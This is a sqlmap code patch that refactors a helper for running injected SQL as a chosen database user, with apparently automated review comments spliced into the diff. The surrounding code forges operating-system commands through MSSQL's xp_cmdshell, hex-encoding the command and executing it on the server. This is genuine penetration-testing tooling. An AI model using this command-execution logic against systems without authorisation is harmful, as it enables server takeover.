From add83528045c62676985c3792f8d8507059b1074 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Mon, 2 Jul 2012 02:14:03 +0100
Subject: [PATCH] make the runAsDBMSUser() generic and ported to abstraction.py so the same function will be used for PostgreSQL dblink() too

---
 lib/takeover/abstraction.py | 16 ++++++++++++++++
 lib/takeover/xp_cmdshell.py | 18 +-----------------
 2 files changed, 17 insertions(+), 17 deletions(-)

diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index 877acc92b..8b2fbbaf9 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -16,6 +16,7 @@ from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import PAYLOAD
 from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.settings import SQL_STATEMENTS
 from lib.core.shell import autoCompletion
 from lib.request import inject
 from lib.takeover.udf import UDF
@@ -37,6 +38,21 @@ class Abstraction(Web, UDF, xp_cmdshell):
 Web.__init__(self)
 xp_cmdshell.__init__(self)

+ def runAsDBMSUser(self, query):
+ if conf.dCred:
+ for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
+ for sqlStatement in sqlStatements:
+ if query.lower().startswith(sqlStatement):
+ sqlType = sqlTitle
+ break
+
+ if sqlType and "SELECT" not in sqlType:
+ query = "SELECT 1;%s" % query
+
+ query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
+
+ return query
+
 def execCmd(self, cmd, silent=False):
 if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
 self.webBackdoorRunCmd(cmd)
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 346d20669..d4b9cac86 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
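Review bot: `sqlType` is read in `if sqlType and "SELECT" not in sqlType:` but is only assigned inside the loop when a SQL_STATEMENTS prefix matches, so a query whose first token matches no entry raises UnboundLocalError instead of falling through; initialise it with `sqlType = None` before the `for sqlTitle, sqlStatements in SQL_STATEMENTS.items():` loop, and note that `break` only leaves the inner loop, so a later matching title silently overwrites an earlier one. The snippet is still fetched with `DBMS.MSSQL` hard-coded although the commit message says the helper is now generic for PostgreSQL dblink(), so a dispatch on the active back-end presumably still has to follow. Only the statement is quoted via `query.replace("'", "''")`; `conf.dbmsUsername` and `conf.dbmsPassword` are interpolated as-is, so a credential containing a single quote would break the generated T-SQL unless the `run_statement_as_user` template escapes them, which is not visible here. The import hunk adds only SQL_STATEMENTS, so confirm `getSPQLSnippet` is already imported in abstraction.py (the import block begins before this hunk). A one-line docstring would also help: `"""Wrap query so it runs under the --dbms-cred user; MSSQL snippet only for now."""`.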
@@ -21,7 +21,6 @@ from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import HASHDB_KEYS
 from lib.core.exception import sqlmapUnsupportedFeatureException
-from lib.core.settings import SQL_STATEMENTS
 from lib.core.threads import getCurrentThreadData
 from lib.core.unescaper import unescaper
 from lib.request import inject
@@ -148,21 +147,6 @@ class xp_cmdshell:
 if cmd:
 self.xpCmdshellExecCmd(cmd)

- def xpCmdshellForgeRunAs(self, query):
- if conf.dCred:
- for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
- for sqlStatement in sqlStatements:
- if query.lower().startswith(sqlStatement):
- sqlType = sqlTitle
- break
-
- if sqlType and "SELECT" not in sqlType:
- query = "SELECT 1;%s" % query
-
- query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
-
- return query
-
 def xpCmdshellForgeCmd(self, cmd):
 self.__randStr = randomStr(lowercase=True)
 self.__cmd = "0x%s" % hexencode(cmd)
@@ -170,7 +154,7 @@ class xp_cmdshell:
 self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
 self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)

- return self.xpCmdshellForgeRunAs(self.__forgedCmd)
+ return self.runAsDBMSUser(self.__forgedCmd)

 def xpCmdshellExecCmd(self, cmd, silent=False):
 cmd = self.xpCmdshellForgeCmd(cmd)
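Review bot: `return self.runAsDBMSUser(self.__forgedCmd)` now relies on a method that this file no longer defines; it lives on Abstraction, which inherits from xp_cmdshell (per the abstraction.py hunk), so the call only resolves when `self` is an Abstraction instance and a bare xp_cmdshell object would raise AttributeError here. If that layering is intended, make the dependency explicit at the call site with `# runAsDBMSUser is provided by lib.takeover.abstraction.Abstraction, which mixes this class in`. The enclosing `xpCmdshellForgeCmd` body starts before this hunk.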